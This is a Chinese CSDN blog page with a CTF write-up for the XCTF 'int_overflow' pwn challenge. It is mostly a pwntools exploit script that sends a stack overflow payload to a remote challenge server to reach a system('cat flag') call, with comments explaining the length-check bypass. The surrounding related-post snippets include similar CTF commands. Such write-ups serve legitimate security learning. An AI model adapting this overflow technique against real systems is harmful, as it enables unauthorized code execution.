[pwn] - xctf题目wp

最新推荐文章于 2023-07-23 15:39:58 发布
最新推荐文章于 2023-07-23 15:39:58 发布
阅读量341 收藏
点赞数
分类专栏: safe - PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/s11show_163/article/details/105766296
版权

int_overflow


exp.py: 


#!/usr/bin/env python
from pwn import *

sh = remote("124.126.19.106",42438)

flag_addr=0x08048694

payload = 'A'*0x14 + 'AAAA' + p32(flag_addr) + 'a'*(256-0x14-4-4+5)
#‘A’*0x14是溢出到ebp
#'AAAA'是之前pop过一次,出栈操作还存着一个ebp地址
#flag_addr是调用system('cat flag')的调用地址
#256+5是为了绕过他的<3u || >8u就报错的分支,-0x14-4-4分别是减去溢出代码、'AAAA'、flag_addr之后补全这么多个空字符
sh.sendlineafter("choice:","1")
sh.sendlineafter("username:\n","xctf")
sh.sendlineafter("passwd:\n",payload)

print sh.recvall()

在这里插入图片描述

s11show_163
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
pwn-200题目文件
02-16
pwn-200题目文件
XCTF pwn部分解题记录
windy_ll的博客
02-13 2994
一、前言     闲来无事,刷刷ctf题(PS:傻逼CSDN,标题不能包含新手二字) 二、题目: level0     1、下载好题目后,拖入到kali中去,用file和checksec查看一下,可以发现该程序是64位,只开了NX保护,如下图所示:     2、拖入到IDA中去,发现在main函数中打印出信息后就调用了vulnerable_function函数,跟进vulnerable_function函数,可以发现read函数处为栈溢出漏洞,并且可以得知该buf数组距离ebp为0x80个字节,如下图所
XCTF hello_pwn题目
weixin_45643931的博客
11-14 2410
第一个题目通过EXP脚本连接上就出现了flag,懒得写WP 这个题目XCTF的第二个题,也是我接触的第一个正式的pwn题目 直接下载附件 之后用IDA打开 打开以后,也不是很确定干啥,就直接ALT+T (搜索) 搜索CTF,flag之类的 之后就搜到了CTF的一句话 双击进去 然后按下F5 查看伪代码 而这里的if语句告诉了我们很多信息,如果XXX,就OOO双击函数进去 分析一下,应该是当…6C = 1853186401 时进入…0686()函数获得flag。 而这两个数据相差4个字节,更方便通过
攻防世界pwn——pwn-200
qq_62076255的博客
12-23 405
做题记录
CTF PWN-攻防世界CGfsb格式化字符串漏洞
道阻且长,行则将至。
07-23 1829
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新手区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
pwn】攻防世界 pwn新手区wp
woodwhale的博客
08-10 7215
pwn】攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界的pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了。 1、get_shell 送分题,连接上去就是/bin/sh 不过不知道为啥我的nc连接不上。。。 还是用pwntool的remote连接的 from pwn import * io = remote("111.200.241.244", 64209) io.interactive() 2、hello pwn 可以看
XCTF-pwn level2 - Writeup
菜小狗.的博客
08-02 4973
XCTF-pwn-level2 WP 终于可以写这个pwn题的wp咯~ 很开心,说明我又有一些收获来解决了一些问题 题目描述菜鸡请教大神如何获得flag,大神告诉他‘使用面向返回的编程(ROP)就可以了’ 先将elf文件下载丢到乌班图里查看一下文件类型,通过checksec查看一下保护情况最后在运行一下瞅瞅到底运行起来是杂肥似。 可以看到NX这项保护是开启的状态,这意味着:栈中数据没有执行...
[XCTF-pwn] 8-monkey 9-warmup 20_csaw-ctf-2016-quals-aul
weixin_52640415的博客
03-03 398
这个题不会,搜了下wp原来这么简单,一直用js都是写网页,没用过os库 题目是个大文件,基本没法看。运行后出提示符,打help有点提示。 其实就是个js的解释器,直接运行命令就能拿到flag js> os.system('cat flag') os.system('cat flag') cyberpeace{fbbe21cdff06b6bb983a88c58185de99} js> ...
2018 XCTF FINALS
Risker
11-06 1188
欢迎关注我的新博客: http://mmmmmmlei.cn 有幸参加了 2018 XCTF FINALS,线下长了不少见识。回学校就打了上海市大学生网络安全竞赛,现在记录一下 XCTF FINALS。 攻防赛四道 pwn,Web 狗也只能打打解题这样子… 解题有 5 道 Misc,2 道 Web 和 4 道 pwn,和队友做出了两道 Misc ,一道 Web 和两道 pwn。不得不说这次的 Mi...
XCTF 攻防世界 web题wp总结
zhy的博客
12-31 3576
xctf上的oj对ctf新手来说,算是比较友好的,由浅入深的题目,除了有一些脑洞题外,其他基本都还算是可以的,给实验室的ctf队伍做讲解交流,也是一直推荐大家去刷一下,出了新手村,把进阶题做好,基本对于一些常见的漏洞和题型能够有了解了。趁着有时间,整理一下之前的wp,给实验室同学提供一下参考,省的到处找wp,也希望能给其他想做这个平台上题目的人一些帮助。不过,做CTF题,还是建议先自己想,自己钻研...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
【202309】毕马威-中国第六届领先汽车科技50_109页.pdf
07-28
【202309】毕马威-中国第六届领先汽车科技50_109页.pdf
毕业设计—流媒体视频直播服务器-可执行内含文档代码-可执行内含文档代码.zip
07-28
毕业设计—流媒体视频直播服务器-可执行内含文档代码-可执行内含文档代码.zip
【202206】中国汽车潮流观察报告-汽车之家研究院_54页.pdf
07-28
【202206】中国汽车潮流观察报告-汽车之家研究院_54页.pdf
tour-project【程序员VIP专用】.zip
最新发布
07-28
【项目简介】 HTML5+CSS实现雪花旅行社
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值